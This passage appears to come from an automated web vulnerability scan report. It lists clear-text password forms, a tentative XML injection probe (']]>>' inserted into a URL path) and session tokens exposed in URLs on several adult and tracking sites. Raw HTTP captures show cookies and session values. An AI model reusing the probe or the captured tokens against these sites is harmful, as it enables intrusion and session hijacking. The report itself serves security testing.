Cookie: ismobile=0; stats=54; prid=--; prib=--; TmplClickPopLayer=1; sc_limit=1; __utma=26208500.868426551.1313434646.1313434646.1313434646.1; __utmb=26208500.1.10.1313434646; __utmz=26208500.1313434646.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); adNum=386; mdg:uid=215%3Aa2

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 18:58:26 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m3
Vary: Accept-Encoding
Content-Length: 11903

<html>
<head>
<title>Login Form</title>
<meta name="description" content="Login Form"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free
...[SNIP]...
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0 bgcolor="#FFFFFF">
       <FORM name=loginForm method=post action="http://xhamster.com/login.php?next=">
<TBODY>
...[SNIP]...
<TD style="PADDING-left: 5px;"><INPUT size=16 tabIndex=8 type=password name=password></TD>
...[SNIP]...

3.13. http://xhamster.com/signup.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /signup.php HTTP/1.1
Host: xhamster.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ismobile=0; stats=54; adNum=12; mdg:uid=940%3Aa5; prid=--; prib=--; TmplClickPopLayer=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 18:56:29 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Srv: m10
Vary: Accept-Encoding
Content-Length: 29083

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<BR>
       <FORM id=loginForm name=loginForm method=post action="http://xhamster.com/login.php?next=">
       <TABLE cellSpacing=0 cellPadding=5 width="100%" border=0>
...[SNIP]...
<TD><INPUT tabIndex=2 type=password name=password></TD>
...[SNIP]...

3.14. http://xhamster.com/signup.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /signup.php HTTP/1.1
Host: xhamster.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ismobile=0; stats=54; adNum=12; mdg:uid=940%3Aa5; prid=--; prib=--; TmplClickPopLayer=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 18:56:29 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Srv: m10
Vary: Accept-Encoding
Content-Length: 29083

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<BR>
                       <FORM id=signupForm name=signupForm method=post action="http://xhamster.com/signup.php?next=">
                           <INPUT type="hidden" name="prev" value="">
...[SNIP]...
<TD><INPUT type=password maxLength=20 name=password1></TD>
...[SNIP]...
<TD><INPUT type=password maxLength=20 name=password2></TD>
...[SNIP]...

4. XML injection  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://banners.bookofsex.com
Path:   /go/page/iframe_cm_26400

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.

Request

GET /go/page]]>>/iframe_cm_26400?pid=p1934513.submad_24810_1_s5232&madirect=http://medleyads.com/spot/c/1313434555/1247371422/13190.html HTTP/1.1
Host: banners.bookofsex.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:19 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,k8fUvvKsWDH_dC7HV3XQwBPXI3vAl_sKu1jXDJ5hPRln66gvkW4C1ZrfoWzNxGUwuhStvC1krqYaPtlWQwqW27JPCSNo7T4vM_5D3236uF1F3gJc3mNXRQA6jDGKtYo88kh9FEes39vXYaMvz5CnXAQXYVCTRE5Wj6idOSIRLdPO3/Utt0cMZnVylsjqLZD3; path=/; domain=.banners.bookofsex.com
Set-Cookie: v_hash=_english_29272; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:19 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:19 GMT
Set-Cookie: ffadult_tr=r,leHvy3H7731NgBzxtr9HhpO_Jtw3voEigBFMEc1y52houjBG4d6PjPbjfuqQG_Kk; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:19 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:19 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:19 GMT
Set-Cookie: REFERRAL_URL=http://medleyads.com/spot/5232.html; path=/; domain=.banners.bookofsex.com; expires=Tue, 16-Aug-2011 07:01:19 GMT
Set-Cookie: click_id_time=1511485567_2011-08-15 12:01:19; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:19 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki53-26.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 372020
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
==4) { if (x.status == 302) { ajax.get(x.getResponseHeader("Location"),f);}else{f(x)}}};if(m=='POST'){x.setRequestHeader('Content-type','application/x-www-form-urlencoded');}x.send(a)}; self.string_to_xml = function (a) { var x = null; a = a.replace(/\<\!\-\-/,'').replace(/\-\-\>
...[SNIP]...
(new DOMParser()).parseFromString(s, "text/xml"); } return x }; self.xml_xslt_transform = function (xml,xslt){ var mydiv = document.createElement('DIV'); if (window.ActiveXObject) { mydiv.innerHTML = xml.transformNode(xslt); } else if (document.implementation && document.implementation.createDocument) { xsltProcessor=new XSLTProcessor(); xsltProcessor.importStylesheet(xslt); mydiv.appendChild(xsltProce
...[SNIP]...

5. Session token in URL  previous  next
There are 13 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


5.1. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://banners.adultfriendfinder.com
Path:   /go/page/iframe_cm_26358

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /go/page/iframe_cm_26358?dcb=sexfinder.com&pid=p1935206.submad_70975_1_s5232&madirect=http://medleyads.com/spot/c/1313434697/1376046894/10664.html HTTP/1.1
Host: banners.adultfriendfinder.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:52 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,IPDnYK9LPElKtOp23iKt5ZzHGR0dtCKllPHqgsvcj13fvkskx4bbQm6F66eDPa410PU86fLd7lbFcIw26rWp9pjKfhvAZsbS2AIta07UzdIhBLLebh/pcIK3wr/3oE8b39ayFOf7NFF/h_LYDH4RXZke/zyv/4Sk5cy5VpAJ9mHO3/Utt0cMZnVylsjqLZD3; path=/; domain=.adultfriendfinder.com
Set-Cookie: v_hash=_english_13029; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: ffadult_tr=r,Gf4cx0MBS68uu5LLsiToqHGKORZFXs5PWa_XSBvVwwhoujBG4d6PjPbjfuqQG_Kk; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki26-18.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 13347
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<noscript><img src="https://glean.pop6.com/images/common/glean.gif?rand=1760&site=ffadult&session=GQ5%60J%5EU%40jEUU+1313434702+50.23.123.106+&pwsid=&pagename=ttp%3A%2F%2Fmedleyads.com%2Fspot%2F5232.html&pagestate=&country=United+States&city=&lang=english&level=&gpid=g1255058&pid=p1935206.submad_70975_1_s5232" width=1 height=1 border=0></noscript>
...[SNIP]...

5.2. http://banners.bookofsex.com/go/page/iframe_cm_26400  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://banners.bookofsex.com
Path:   /go/page/iframe_cm_26400

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /go/page/iframe_cm_26400?pid=p1934513.submad_24810_1_s5232&madirect=http://medleyads.com/spot/c/1313434555/1247371422/13190.html HTTP/1.1
Host: banners.bookofsex.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:55:59 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,auy/Hn8z06UROlnTRnsrjRPXI3vAl_sKu1jXDJ5hPRln66gvkW4C1ZrfoWzNxGUwuhStvC1krqYaPtlWQwqW27JPCSNo7T4vM_5D3236uF1F3gJc3mNXRQA6jDGKtYo88kh9FEes39vXYaMvz5CnXAQXYVCTRE5Wj6idOSIRLdPO3/Utt0cMZnVylsjqLZD3; path=/; domain=.banners.bookofsex.com
Set-Cookie: v_hash=_english_29272; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: ffadult_tr=r,leHvy3H7731NgBzxtr9HhpO_Jtw3voEigBFMEc1y52houjBG4d6PjPbjfuqQG_Kk; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki45-15.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 24781
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<noscript><img src="https://glean.pop6.com/images/common/glean.gif?rand=2300&site=ffadult&session=G%3C%3A%3C%5D%40DQN%5B%3EL+1313434558+50.23.123.106+&pwsid=&pagename=ttp%3A%2F%2Fmedleyads.com%2Fspot%2F5232.html&pagestate=&country=United+States&city=&lang=english&level=&gpid=g1255058&pid=p1934513.submad_24810_1_s5232" width=1 height=1 border=0></noscript>
...[SNIP]...

5.3. http://glean.pop6.com/images/common/glean.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://glean.pop6.com
Path:   /images/common/glean.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/common/glean.gif?rand=3925&site=ff&session=%5E5L@NF%5E%5EjH6%201313434662%2050.23.123.106%20&pwsid=&pagename=/&pagestate=&referer=&country=United%20States&city=&lang=english&level=&gpid=g466070&pid=p9815&event=&pagerendertime=1064&testbed=0 HTTP/1.1
Host: glean.pop6.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ff_who=r,5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; v_hash=_english_0; IP_COUNTRY=United States; ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; LOCATION_FROM_IP=ip_type&Mapped&connection&tx&country_code&US&lat&37.33053&asn&36351&state&California&ip_routing_type&fixed&carrier&softlayer+technologies+inc.&city&San+Jose&postal_code&95122&country_code_cf&99&state_cf&95&latitude&37.33053&second_level_domain&softlayer&country&United+States&longitude&-121.83823&country_name&United+States&area_code&408&timezone&-8.0&line_speed&high&aol&0&top_level_domain&com&region&southwest&city_cf&80&pmsa&7400&zip&95122&msa&41940&continent&north+america&lon&-121.83823&dma_code&807; HISTORY=20110815-1-Dc; REFERRAL_URL=; click_id_time=1867065876_2011-08-15 11:57:42

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:34 GMT
Server: Apache/2.2.3 (CentOS) mod_perl/2.0.4 Perl/v5.8.8
Pragma: no-cache
Cache-control: no-cache
Content-Type: image/gif
Expires: Mon, 15 Aug 2011 19:05:34 GMT
Content-Length: 42

GIF89a.............!.......,........@..2.;

5.4. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=b8241a5c-6fa7-404a-9989-13f94cdfff16&hostname=money.cnn.com&location=%2F2011%2F08%2F15%2Ftechnology%2Fgoogle_motorola%2Findex.htm&url=http%3A%2F%2Fmoney.cnn.com%2F2011%2F08%2F15%2Ftechnology%2Fgoogle_motorola%2Findex.htm%3Fhpt%3Dhp_t2&sessionID=1313434008984.63802&fpc=7549672-131cec47d99-1e28128-1&ts1313434014019.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE4fCaYVTTzg6idhAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 15 Aug 2011 18:45:58 GMT
Connection: keep-alive


5.5. http://pop6.com/p/memsearch.cgi  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://pop6.com
Path:   /p/memsearch.cgi

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /p/memsearch.cgi HTTP/1.1
Host: pop6.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/
Content-Length: 281
Cache-Control: max-age=0
Origin: http://pop6.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ff_who=r,5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; v_hash=_english_0; IP_COUNTRY=United States; ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; LOCATION_FROM_IP=ip_type&Mapped&connection&tx&country_code&US&lat&37.33053&asn&36351&state&California&ip_routing_type&fixed&carrier&softlayer+technologies+inc.&city&San+Jose&postal_code&95122&country_code_cf&99&state_cf&95&latitude&37.33053&second_level_domain&softlayer&country&United+States&longitude&-121.83823&country_name&United+States&area_code&408&timezone&-8.0&line_speed&high&aol&0&top_level_domain&com&region&southwest&city_cf&80&pmsa&7400&zip&95122&msa&41940&continent&north+america&lon&-121.83823&dma_code&807; HISTORY=20110815-1-Dc; REFERRAL_URL=; click_id_time=1867065876_2011-08-15 11:57:42; ki_u=e0c8bfdc-f008-5f82-d3b9-1cc1d298f090; ki_t=1313434723803%3B1313434723803%3B1313434723803%3B1%3B1

who=r%2C5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w%2FCzZc1DYiFS5o5eIrIEI51W9T%2FzDmtNu%2Fo&site=ff&searchtype=photo_search&looking_for_person=1&find
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:35 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ff_who=r,9tCSyhGmD_RyWOBWStVf6Xu9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; path=/; domain=.pop6.com
Set-Cookie: v_hash=_english_0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: LOCATION_FROM_IP=connection&tx&ip_type&Mapped&lat&37.33053&country_code&US&asn&36351&state&California&carrier&softlayer+technologies+inc.&ip_routing_type&fixed&city&San+Jose&state_cf&95&country_code_cf&99&postal_code&95122&latitude&37.33053&second_level_domain&softlayer&country&United+States&area_code&408&country_name&United+States&longitude&-121.83823&line_speed&high&timezone&-8.0&aol&0&region&southwest&top_level_domain&com&city_cf&80&pmsa&7400&msa&41940&zip&95122&continent&north+america&lon&-121.83823&dma_code&807; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: HISTORY=20110815-3-Dcs1; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ii70-15.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 75888
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<noscript><img src="https://glean.pop6.com/images/common/glean.gif?rand=7705&site=ff&session=%5E5L%5C%40NF%5E%5EjH6+1313434662+50.23.123.106+&pwsid=&pagename=ttp%3A%2F%2Fpop6.com%2F&pagestate=&country=United+States&city=&lang=english&level=&gpid=g466070&pid=p9815" width=1 height=1 border=0></noscript>
...[SNIP]...

5.6. http://sales.liveperson.net/hc/76226072/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/76226072/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/76226072/?visitor=&msessionkey=&site=76226072&cmd=startPage&page=http%3A//www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=1313432467768&javaSupport=true&id=1570370816&scriptVersion=1.1&d=1313432500472&&PAGEVAR!unit=wireless&SESSIONVAR!language=english&PAGEVAR!UAScontext=Windows%20Packages%20-%20Wireless%20from%20AT%26T&PAGEVAR!Section=Store&SESSIONVAR!visitorType=NEW&PAGEVAR!OrderDetails=&PAGEVAR!OrderDetails2=&VISITORVAR!VisitorID=1fKdTJjTTvqPt1%211142544054%211313432403008&cobrowse=true&scriptType=SERVERBASED&cookie=TLTUID%3D7284D2A8C16210C1695BC3E02554C7F2%3B%20ECOM_GTM%3DNA_osbth%3B%20cust_type%3Dnew%3B%20browserid%3DA001693504923%3B%20svariants%3DNA%3B%20DL3K%3D3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg%3B%2000d78e1f-01f0-45cd-9f9c-79e690335b05%3D%257B%2522parent_id%2522%253A%2522kwkf9w9SRba%2522%252C%2522referrer%2522%253A%2522http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%2522%252C%2522id%2522%253A%2522uo_OgfisI0f%2522%252C%2522wom%2522%253Atrue%252C%2522entry_point%2522%253A%2522http%253A%252F%252Fwww.wireless.att.com%252Fcell-phone-service%252Fcell-phones%252Fcell-phones.jsp%253Ffeacondition%253Dallphones%2526feaavailable%253Dallphones%2526feapaytype%253Dstandard%2526startFilter%253Dfalse%2526allTypes%253Don%2526osWindows%252520Phone%253D100012%2526allManus%253Don%2526source%253DECWD000000000000O%2523fbid%25253Dkwkf9w9SRba%2526migAtlSA%253D341465538%2526migAtlC%253D480d7815-42e6-4315-a737-64cdf14f8adc%2522%252C%2522url_tag%2522%253A%2522NOMTAG%2522%257D%3B%20bn_u%3D6923670900791695274%3B%20__utma%3D52846072.1104250127.1312768993.1312768993.1312768993.1%3B%20__utmz%3D52846072.1312768993.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/referrerPathName%3B%20__utma%3D241758596.1378329856.1312769231.1312769231.1313431966.2&title=&referrer= HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp
Cookie: LivePersonID=-546022977410-1313431914:-1:-1:-1:-1; HumanClickKEY=7991325949139639887; HumanClickSiteContainerID_76226072=Master; LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1313432439530

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:20:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_76226072=Master; path=/hc/76226072
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89a(............,...........L.;

5.7. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://wls.wireless.att.com
Path:   /dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif?&dcsdat=1313432466426&dcssip=www.wireless.att.com&dcsuri=/cell-phone-service/packages/free-packages.jsp&dcsqry=%3Fsource%3DECWD000000000000O&dcsref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&WT.mc_id=ECWD000000000000O&WT.tz=-5&WT.bh=13&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Free%20Phone%20Deals%20and%20Packages%20-%20Shop%20-%20Wireless%20from%20AT%26T&WT.js=Yes&WT.bs=1163x508&WT.fi=No&WT.vt_sid=123&browserid=A001693504923&sessionid=null&buyflowtype=NEW&wt_aka_georegion=246&wt_aka_country_code=US&wt_aka_region_code=CA&wt_aka_city=SANJOSE&wt_aka_dma=807&wt_aka_pmsa=7400&wt_aka_msa=7362&wt_aka_areacode=408&wt_aka_county=SANTACLARA&wt_aka_fips=06085&wt_aka_lat=37.3353&wt_aka_long=-121.8938&wt_aka_timezone=PST&wt_aka_zip=95101&wt_aka_continent=NA&wt_aka_throughput=v